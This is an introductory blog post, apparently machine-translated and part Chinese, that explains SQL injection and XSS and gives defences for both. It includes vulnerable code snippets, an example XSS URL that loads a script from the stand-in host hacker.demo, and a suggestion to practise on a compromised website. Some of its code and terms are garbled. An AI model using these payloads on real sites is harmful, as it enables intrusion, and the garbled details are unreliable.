As a computer novice, I always think that hackers are awesome, so simply understand this negative knowledge-information security.
Hacker is an English translation, translated as Hacker. There are many ways of hacking or hacking computers, mainly divided into two types:
(1)非破坏性的攻击:一般是为了扰乱系统的运行,并不盗窃系统资料,仅仅只是使服务器暂时失去对外提供服务的能力,通常采用拒绝服务攻击或信息炸弹
(2)破坏性攻击:是以侵入他人电脑系统、盗窃系统保密信息、破坏目标系统的数据为目的
common attacks include DDOS, CSRF, Dos, etc. The usual methods are virus, flood, and system vulnerabilities.
Here are a few brief introductions
SQL injection
常见的注入式攻击,通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句Add link description
The essential reason that SQL injection can be performed is that the code and data are not strictly isolated, which causes users to mistakenly execute the data as part of the code when reading the data.
Here is a simple example:
var testCondition;
testCondition = Request.from("testCondition")
var sql ="select * from TableA where id='"+ testCondition +"'";
In the above example, if the ID entered by the user is just a number, of course there is no problem, but if you insert other SQL statements in testCondition after separating with ";", unexpected results will appear. For example, input drop, delete Etc. For example, if you accidentally enter a character like "#–!#@" and then save it so that the database is updated, the information behind where will be commented out, and the execution statement will become
updata table set memo=""# --! #(@" where use_id=xxxxxxx;
So that the data in the memo field of the entire database is updated, instead of your data alone.
Here are a few brothers who have written in detail, you can go and see
(1) The most detailed SQL injection tutorial-Yi Liwei
(2) SQL in the web complete article
(3) SQL injection attacks
(4) Break the website with sql injection
You can find a broiler website to try it or write a broiler website yourself is also a good choice.
SQL injection is very harmful. We can prevent it from the following aspects when designing the program.
(1)过滤用户输入参数中的特殊字符,从而降低被SQL注入的风险
(2)禁止使用字符串拼接的SQL语句,严格使用参数绑定传入的SQL参数
(3)合理使用数据库访问框架提供的防注入机制
xss attack
XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets,CSS)
的缩写混淆,故将跨站脚本攻击缩写为XSS,XSS是一种在web应用中的计算机安全漏洞,
它允许恶意web用户将代码植入到提供给其它用户使用的页面中。即黑客通过技术手段向
正常用户请求的HTML页面中插入恶意脚本,从而可以执行任意脚本
Classification of xss
(1) Reflective XSS
恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来
实施攻击的。
(2) Stored XSS
恶意代码被保存到目标网站的服务器中,这种攻击具有较强的稳定性和持久性,比较
常见场景是在博客,论坛等社交网站上,但OA系统,和CRM系统上也能看到它身影,比如某
CRM系统的客户投诉功能上存在XSS存储型漏洞,黑客提交了恶意攻击代码,当系统管理员
查看投诉信息时恶意代码执行,窃取了客户的资料,然而管理员毫不知情,这就是典型的
XSS存储型攻击。
(3) DOM type XSS
其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。
For example, in the Weibo or so XSS worm attack in 2011, the attacker used the Weibo publishing function to not effectively filter the action-data vulnerabilities, and put on the URL containing the attack script when publishing the Weibo information, and the user visited The Weibo is crazy to load a malicious script, which will allow users to automatically forward the same Weibo with their own account. Through such viral spread, a large number of users have been attacked.
Here is a simple example that may result in a file of reflective XSS:
<div>
<h3>反射型XSS实例</h3>
<br>用户:<%=request.getParamer("useName")%>
<br>系统错误信息:<%=request.getParamer("errorMessage")%>
<div>
The above code obtains the userName and errorMessage two parameters from the HTTP request, and directly outputs them to HTML for display. When constructing such a URL, reflective XSS appears, and the user will execute the script file.
http://xss.demo/self-xss.jsp?userName=666<script>alert("666")</script>
&errorMessage=XSS实例<script scr=http://hacker.demo/xss-script.js>
The prevention of XSS attacks is mainly through filtering and escaping the user input data, such as using the jsonp framework to XSS filter the user input string, and using the HtmlUtils in the Sping framework to html escape the user input string, etc.
Here are a few more detailed XSS attack blogs
(1) XSS attacks on web security
(2) XSS cross-site scripting attacks
(3) XSS defense methods
(4) Talking about the principle of XSS attacks.
Time is passing by, next time I Let’s share a little bit about the third type of hacking: CSRF.